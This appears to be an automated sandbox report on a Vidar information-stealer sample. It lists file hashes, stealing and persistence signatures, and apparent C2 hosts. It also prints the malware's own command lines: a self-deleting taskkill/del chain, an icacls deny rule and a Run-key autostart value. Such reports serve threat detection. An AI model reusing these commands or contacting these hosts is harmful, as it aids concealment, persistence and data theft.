| SHA512 | 211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3 |
memory/3420-129-0x0000020B69330000-0x0000020B695DA000-memory.dmp
memory/3420-132-0x0000020B69073000-0x0000020B69075000-memory.dmp
memory/3420-133-0x0000020B69075000-0x0000020B69076000-memory.dmp
memory/3420-134-0x0000020B69076000-0x0000020B69077000-memory.dmp
memory/3420-131-0x0000020B69070000-0x0000020B69072000-memory.dmp
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
| MD5 | c9622e294a0f3c6c4dfcf716cd2e6692 |
| SHA1 | 829498d010f331248be9fd512deb44d1eceac344 |
| SHA256 | f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe |
| SHA512 | d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552 |
memory/1752-136-0x0000000000000000-mapping.dmp
memory/2100-137-0x0000000000000000-mapping.dmp
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
| MD5 | 27cfb3990872caa5930fa69d57aefe7b |
| SHA1 | 5e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f |
| SHA256 | 43881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146 |
| SHA512 | a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a |
C:\Users\Public\Documents\Wondershare\NFWCHK.exe.config
| MD5 | ad0967a0ab95aa7d71b3dc92b71b8f7a |
| SHA1 | ed63f517e32094c07a2c5b664ed1cab412233ab5 |
| SHA256 | 9c1212bc648a2533b53a2d0afcec518846d97630afb013742a9622f0df7b04fc |
| SHA512 | 85766a907331f60044ec205cf345453fc3d44bfcac296ac93a12e8a752b84290dfd94f73b71de82f46f9503177d29602cbb87549f89dc61373d889b4ea26634b |
memory/1752-145-0x00000222F2400000-0x00000222F2401000-memory.dmp
memory/1752-148-0x00000222F2750000-0x00000222F2751000-memory.dmp
memory/1752-149-0x00000222F25C0000-0x00000222F25C2000-memory.dmp
memory/1752-150-0x00000222F25C3000-0x00000222F25C5000-memory.dmp
memory/2100-151-0x00000000009F0000-0x00000000009F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ready.ps1
| MD5 | 3447df88de7128bdc34942334b2fab98 |
| SHA1 | 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb |
| SHA256 | 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9 |
| SHA512 | 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f |
memory/4016-157-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\wjdjg0xd\wjdjg0xd.cmdline
| MD5 | 216e29c2b7df75e2ab7d14483718306c |
| SHA1 | 2914efd5305895b136167d03497dfe63179409ea |
| SHA256 | d0479dcacc294773d9f34e58b7660108a75c502c15cab49ad6f429f5c82d2a02 |
| SHA512 | 60aa8027f567a6fec0ec2c7a239ccff1a224c9c7109c89b7d49f5c8717b379ddc732ae905ec2ebe0bc46d6c4193182c535b507777f071b73b190a0c8df47f581 |
\??\c:\Users\Admin\AppData\Local\Temp\wjdjg0xd\wjdjg0xd.0.cs
| MD5 | 4864fc038c0b4d61f508d402317c6e9a |
| SHA1 | 72171db3eea76ecff3f7f173b0de0d277b0fede7 |
| SHA256 | 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84 |
| SHA512 | 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31 |
memory/1036-160-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\wjdjg0xd\CSC811B30464E124A8BB81DC0AA3893821C.TMP
| MD5 | 86852935139ed17789c2a9c597026ae6 |
| SHA1 | f21e57653e0ddc6fbd30eecdb8eb6a485bc4ae3a |
| SHA256 | ae72f91c628f21307027bc08243dd44799e6131d33206291c2c7fb6dd4958fe8 |
| SHA512 | 5e7f9ca3b383603dee85e6720f05ce1a71bb46235a053144362f76796f6537ae04ff6cc3389807df36ba27410fc1dd97df25b1921cfe5d4ab35cb228da9578ff |
C:\Users\Admin\AppData\Local\Temp\RES4730.tmp
| MD5 | 918e6777177726e9f4b8e62311c3f7ff |
| SHA1 | 80e487dd2c22c620b950f27a2856309332ac77a5 |
| SHA256 | 1d708f6c2134fe81b326b8d07994ae85934ab6796f8d81b5baf080701185aa83 |
| SHA512 | 444f2ec3782c9fcfbccffc93c3489be84e3dcb02d62e7c19b18ae19270449edf5bf76dd87d4a9784b0d3dd66e64c6b54273628817e1cd53b3f58d9feddad5bc4 |
C:\Users\Admin\AppData\Local\Temp\wjdjg0xd\wjdjg0xd.dll
| MD5 | 530ac98589c992e8b76d9d9d7306d513 |
| SHA1 | 568561e8895835f6bf9cbb6428d1f31ade4988fe |
| SHA256 | 1d2bb8c42349a65afc31344d2d35d1f1e4d29099dbb8c84590e98a764ab65c51 |
| SHA512 | 551911896d9b70e4432a7b81dc4942f4aa901419045360b5debec2d61276cb4df5ad5269fba01abd6c4e66863525420868596b660525ec74ce324202ec9515fb |
memory/1752-164-0x00000222F2570000-0x00000222F2571000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
| MD5 | 43473f4e719958639a9d89e5d8388999 |
| SHA1 | ccb79eb606a23daa4b3ff8f996a2fbf281f31491 |
| SHA256 | ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734 |
| SHA512 | 1051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa |
memory/1752-166-0x00000222F25C6000-0x00000222F25C8000-memory.dmp
memory/1752-169-0x00000222F25C8000-0x00000222F25C9000-memory.dmp
memory/1752-172-0x00000222F2C80000-0x00000222F2C81000-memory.dmp
memory/1752-173-0x00000222F3010000-0x00000222F3011000-memory.dmp
memory/2392-180-0x0000000000000000-mapping.dmp
memory/2392-187-0x00000235197C0000-0x00000235197C2000-memory.dmp
memory/2392-188-0x00000235197C3000-0x00000235197C5000-memory.dmp
memory/2392-214-0x00000235197C6000-0x00000235197C8000-memory.dmp
memory/4140-223-0x0000000000000000-mapping.dmp
memory/4140-233-0x000002B01F320000-0x000002B01F322000-memory.dmp
memory/2392-232-0x00000235197C8000-0x00000235197CA000-memory.dmp
memory/4140-234-0x000002B01F323000-0x000002B01F325000-memory.dmp
memory/4140-254-0x000002B01F326000-0x000002B01F328000-memory.dmp
memory/4416-264-0x0000000000000000-mapping.dmp
memory/4140-295-0x000002B01F328000-0x000002B01F32A000-memory.dmp
memory/4416-296-0x0000022E9CC00000-0x0000022E9CC02000-memory.dmp
memory/4416-297-0x0000022E9CC03000-0x0000022E9CC05000-memory.dmp
memory/4416-298-0x0000022E9CC06000-0x0000022E9CC08000-memory.dmp
memory/4832-321-0x0000000000000000-mapping.dmp
memory/4852-322-0x0000000000000000-mapping.dmp
memory/4872-323-0x0000000000000000-mapping.dmp
memory/5052-360-0x0000000000000000-mapping.dmp
memory/5072-361-0x0000000000000000-mapping.dmp
memory/5104-364-0x0000000000000000-mapping.dmp
memory/4100-365-0x0000000000000000-mapping.dmp
memory/680-366-0x0000000000000000-mapping.dmp
memory/4016-367-0x0000000000000000-mapping.dmp
memory/2784-368-0x0000000000000000-mapping.dmp
memory/4112-369-0x0000000000000000-mapping.dmp
memory/4120-370-0x0000000000000000-mapping.dmp
memory/3204-371-0x0000000000000000-mapping.dmp
\Windows\Branding\mediasrv.png
| MD5 | 271eacd9c9ec8531912e043bc9c58a31 |
| SHA1 | c86e20c2a10fd5c5bae4910a73fd62008d41233b |
| SHA256 | 177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934 |
| SHA512 | 87375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0 |
\Windows\Branding\mediasvc.png
| MD5 | 1fa9c1e185a51b6ed443dd782b880b0d |
| SHA1 | 50145abf336a196183882ef960d285bd77dd3490 |
| SHA256 | f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959 |
| SHA512 | 16bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc |
memory/4312-374-0x0000000000000000-mapping.dmp
memory/4332-375-0x0000000000000000-mapping.dmp
memory/4220-376-0x0000000000000000-mapping.dmp
memory/4192-377-0x0000000000000000-mapping.dmp
memory/4168-378-0x0000000000000000-mapping.dmp
memory/4160-379-0x0000000000000000-mapping.dmp
memory/4560-380-0x0000000000000000-mapping.dmp
memory/4576-381-0x0000000000000000-mapping.dmp
memory/4636-382-0x0000000000000000-mapping.dmp
memory/4652-383-0x0000000000000000-mapping.dmp
memory/4532-384-0x0000000000000000-mapping.dmp
memory/4664-385-0x0000000000000000-mapping.dmp
memory/4732-386-0x0000000000000000-mapping.dmp
memory/4876-387-0x0000000000000000-mapping.dmp
memory/4940-388-0x0000000000000000-mapping.dmp
memory/4956-389-0x0000000000000000-mapping.dmp
memory/4956-396-0x0000027B2B883000-0x0000027B2B885000-memory.dmp
memory/4956-395-0x0000027B2B880000-0x0000027B2B882000-memory.dmp
memory/4956-404-0x0000027B2B886000-0x0000027B2B888000-memory.dmp
memory/4956-455-0x0000027B2B888000-0x0000027B2B889000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Setup.zip
| MD5 | 36f178576dcb8db35d6f06448b1eb510 |
| SHA1 | 62277c90cc2b1bb81b36571037afe5081b0605d5 |
| SHA256 | 192fed6a13a0e73d5196a43bc72eeac16e4962ce465ea67dd60d8b16368c215a |
| SHA512 | 9e1dfe8e5196afb5a39d5302d6948cc7282b95c77aba435ed14453094022a302a6c780fbfd2615377d94e2b7e2913601e9129eb6d3398db0ba25344075e5dc96 |
memory/4396-469-0x0000000000000000-mapping.dmp
memory/4204-470-0x0000000000000000-mapping.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:35
Platform
win10v20210410
Max time kernel
149s
Max time network
167s
Command Line
Signatures
Vidar
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
Modifies extensions of user files
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\f89eb7ae-22f6-4c28-ba2d-1bd6248b5a37\build2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\f89eb7ae-22f6-4c28-ba2d-1bd6248b5a37\build2.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads user/profile data of web browsers
Accesses 2FA software files, possible credential harvesting
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ad50b6c9-1388-428a-a34b-2bd70e9f1cd9\\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe | N/A |
Checks installed software on the system
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Suspicious use of SetThreadContext
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\f89eb7ae-22f6-4c28-ba2d-1bd6248b5a37\build2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\f89eb7ae-22f6-4c28-ba2d-1bd6248b5a37\build2.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (blob omitted) | C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
"C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe"
C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
"C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\ad50b6c9-1388-428a-a34b-2bd70e9f1cd9" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
"C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
"C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\f89eb7ae-22f6-4c28-ba2d-1bd6248b5a37\build2.exe
"C:\Users\Admin\AppData\Local\f89eb7ae-22f6-4c28-ba2d-1bd6248b5a37\build2.exe"
C:\Users\Admin\AppData\Local\f89eb7ae-22f6-4c28-ba2d-1bd6248b5a37\build2.exe
"C:\Users\Admin\AppData\Local\f89eb7ae-22f6-4c28-ba2d-1bd6248b5a37\build2.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\f89eb7ae-22f6-4c28-ba2d-1bd6248b5a37\build2.exe" & del C:\ProgramData\*.dll & exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /im build2.exe /f
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
C:\Users\Admin\AppData\Local\ad50b6c9-1388-428a-a34b-2bd70e9f1cd9\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
C:\Users\Admin\AppData\Local\ad50b6c9-1388-428a-a34b-2bd70e9f1cd9\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe --Task
C:\Users\Admin\AppData\Local\ad50b6c9-1388-428a-a34b-2bd70e9f1cd9\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
C:\Users\Admin\AppData\Local\ad50b6c9-1388-428a-a34b-2bd70e9f1cd9\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe --Task
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | api.2ip.ua | udp |
| N/A | 77.123.139.190:443 | api.2ip.ua | tcp |
| N/A | 77.123.139.190:443 | api.2ip.ua | tcp |
| N/A | 8.8.8.8:53 | securebiz.org | udp |
| N/A | 8.8.8.8:53 | astdg.top | udp |
| N/A | 211.168.197.211:80 | securebiz.org | tcp |
| N/A | 116.58.10.58:80 | astdg.top | tcp |
| N/A | 8.8.8.8:53 | shpak125.tumblr.com | udp |
| N/A | 74.114.154.18:443 | shpak125.tumblr.com | tcp |
| N/A | 116.202.183.50:80 | 116.202.183.50 | tcp |
| N/A | 8.8.8.8:53 | api.2ip.ua | udp |
| N/A | 77.123.139.190:443 | api.2ip.ua | tcp |
Files
memory/3744-114-0x0000000000400000-0x0000000000537000-memory.dmp
memory/3744-115-0x0000000000424141-mapping.dmp
memory/1696-116-0x0000000000C60000-0x0000000000D7B000-memory.dmp
memory/3468-117-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\ad50b6c9-1388-428a-a34b-2bd70e9f1cd9\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
| MD5 | b2a93feb45e2d76bdfc83c623a14d5bf |
| SHA1 | f39c5e92adb9ba4602d8973cc286ab265f11d137 |
| SHA256 | 83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3 |
| SHA512 | db93fcade10ff3b4291d6337acdb9a675e178154d98c1feb5f5c63e814edd08a37cfcab0140a6e0b84e5013127a93c8c4c4249c5d669a148fb0caf65575c66a5 |
memory/2696-119-0x0000000000000000-mapping.dmp
memory/3744-120-0x0000000000400000-0x0000000000537000-memory.dmp
memory/3972-122-0x0000000000424141-mapping.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
| MD5 | efac2ed2ff1c33c0ae481634d5dedef1 |
| SHA1 | d74e4fcb20b4c78dd9a993565d262024f5e83c5d |
| SHA256 | 26b096b54a80f53a49b05927c87ea29ad304443e721ee204dec183f81eb16891 |
| SHA512 | 80eb2cd014f5e3da1e63f2300f977c5595bacf6e0754b3d32fbaed2a1eace4992db9bbbcb86af96f7cd5810bffd8bfaf0a1e389042554fa90ef008a07d88ffd3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
| MD5 | 5ff584af05cab237078a6630a50548fe |
| SHA1 | de58d2ed9b44cd4fd89c45ea7136d0faf86a7d63 |
| SHA256 | a9d0645039bc6644e1f83f69c4d78cc3a9a3a55615921a0c44a8c5abd3404eac |
| SHA512 | 07c3dc4a07fd68ae982cffec18a8aa7ffc708b832aada915c653398aba8f61c212c64e971afa47eebb547d124e33a1d5e093c9235dfcee9386b4c43a93dcc4b6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
| MD5 | da17784901c7cf8a3cc8bb124668de35 |
| SHA1 | bd7675acca171ec659a1282cab7ce0b03772bc96 |
| SHA256 | 6ab2a73a4684bdca1e9654b21ba1832402e562f8856b12da4af482ffbe5e7329 |
| SHA512 | b074907f9a2ee6f05a0cfac3f7988a0b5ae72a7e5074441736a5ab74ed2709a8049d73f691a0249b7a37901a90f794721f2f99eaee2ca8b2f4170b47ef7a5146 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
| MD5 | 38b33d357b48f05e2e68d4f8a1db047a |
| SHA1 | 8ce535f29afb1fa588d7152fcc59f35cefc987ba |
| SHA256 | 74e458267a323f8bd03a94b9e476f734f925907f1d331d5faaec13dfaddd561e |
| SHA512 | e92bb39c16f71a3a42457e917cbf80cf1ec04e34b14c63b5650d3d485556cbb371c81053e263ac5aaa531c7705ab375c92d85f98a9a8cff173c01905bed1ce3f |
memory/3972-127-0x0000000000400000-0x0000000000537000-memory.dmp
memory/3016-128-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\f89eb7ae-22f6-4c28-ba2d-1bd6248b5a37\build2.exe
| MD5 | bb494dd99be260d8eeb1980ce2a96d4c |
| SHA1 | ac28b998e53f55c106f624025480ab9a51a00539 |
| SHA256 | 910c0e730a147927a0b840ac1d5501c0046d6c568da8adced6ce9d95171bf886 |
| SHA512 | b135732538c19d17aca4ec51fea19d1200ae387e2fccdb91876e9890ac28de58bde4bba8d5801532a76015eda3d08bcc9f65398c4c5e63537e96d916ce7c7030 |
memory/2728-131-0x0000000000400000-0x00000000004A1000-memory.dmp
memory/2728-132-0x000000000046B76D-mapping.dmp
C:\Users\Admin\AppData\Local\f89eb7ae-22f6-4c28-ba2d-1bd6248b5a37\build2.exe
| MD5 | bb494dd99be260d8eeb1980ce2a96d4c |
| SHA1 | ac28b998e53f55c106f624025480ab9a51a00539 |
| SHA256 | 910c0e730a147927a0b840ac1d5501c0046d6c568da8adced6ce9d95171bf886 |
| SHA512 | b135732538c19d17aca4ec51fea19d1200ae387e2fccdb91876e9890ac28de58bde4bba8d5801532a76015eda3d08bcc9f65398c4c5e63537e96d916ce7c7030 |
memory/2728-135-0x0000000000400000-0x00000000004A1000-memory.dmp
memory/3016-134-0x0000000000640000-0x00000000006DE000-memory.dmp
\ProgramData\nss3.dll
| MD5 | bfac4e3c5908856ba17d41edcd455a51 |
| SHA1 | 8eec7e888767aa9e4cca8ff246eb2aacb9170428 |
| SHA256 | e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78 |
| SHA512 | 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66 |
\ProgramData\mozglue.dll
| MD5 | 8f73c08a9660691143661bf7332c3c27 |
| SHA1 | 37fa65dd737c50fda710fdbde89e51374d0c204a |
| SHA256 | 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd |
| SHA512 | 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89 |
memory/2588-138-0x0000000000000000-mapping.dmp
memory/3148-139-0x0000000000000000-mapping.dmp
memory/1452-140-0x0000000000000000-mapping.dmp
C:\ProgramData\freebl3.dll
| MD5 | ef2834ac4ee7d6724f255beaf527e635 |
| SHA1 | 5be8c1e73a21b49f353c2ecfa4108e43a883cb7b |
| SHA256 | a770ecba3b08bbabd0a567fc978e50615f8b346709f8eb3cfacf3faab24090ba |
| SHA512 | c6ea0e4347cbd7ef5e80ae8c0afdca20ea23ac2bdd963361dfaf562a9aed58dcbc43f89dd826692a064d76c3f4b3e92361af7b79a6d16a75d9951591ae3544d2 |
C:\ProgramData\mozglue.dll
| MD5 | 8f73c08a9660691143661bf7332c3c27 |
| SHA1 | 37fa65dd737c50fda710fdbde89e51374d0c204a |
| SHA256 | 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd |
| SHA512 | 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89 |
C:\ProgramData\vcruntime140.dll
| MD5 | 7587bf9cb4147022cd5681b015183046 |
| SHA1 | f2106306a8f6f0da5afb7fc765cfa0757ad5a628 |
| SHA256 | c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d |
| SHA512 | 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f |
C:\ProgramData\nss3.dll
| MD5 | bfac4e3c5908856ba17d41edcd455a51 |
| SHA1 | 8eec7e888767aa9e4cca8ff246eb2aacb9170428 |
| SHA256 | e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78 |
| SHA512 | 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66 |
C:\ProgramData\softokn3.dll
| MD5 | a2ee53de9167bf0d6c019303b7ca84e5 |
| SHA1 | 2a3c737fa1157e8483815e98b666408a18c0db42 |
| SHA256 | 43536adef2ddcc811c28d35fa6ce3031029a2424ad393989db36169ff2995083 |
| SHA512 | 45b56432244f86321fa88fbcca6a0d2a2f7f4e0648c1d7d7b1866adc9daa5eddd9f6bb73662149f279c9ab60930dad1113c8337cb5e6ec9eed5048322f65f7d8 |
C:\ProgramData\msvcp140.dll
| MD5 | 109f0f02fd37c84bfc7508d4227d7ed5 |
| SHA1 | ef7420141bb15ac334d3964082361a460bfdb975 |
| SHA256 | 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4 |
| SHA512 | 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39 |
C:\Users\Admin\AppData\Local\ad50b6c9-1388-428a-a34b-2bd70e9f1cd9\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
| MD5 | b2a93feb45e2d76bdfc83c623a14d5bf |
| SHA1 | f39c5e92adb9ba4602d8973cc286ab265f11d137 |
| SHA256 | 83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3 |
| SHA512 | db93fcade10ff3b4291d6337acdb9a675e178154d98c1feb5f5c63e814edd08a37cfcab0140a6e0b84e5013127a93c8c4c4249c5d669a148fb0caf65575c66a5 |
memory/2784-149-0x0000000000424141-mapping.dmp
memory/2784-151-0x0000000000400000-0x0000000000537000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:36
Platform
win7v20210410
Max time kernel
115s
Max time network
178s
Command Line
Signatures
Vidar
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1140 set thread context of 1852 | N/A | C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe | C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (blob omitted) | C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (blob omitted) | C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
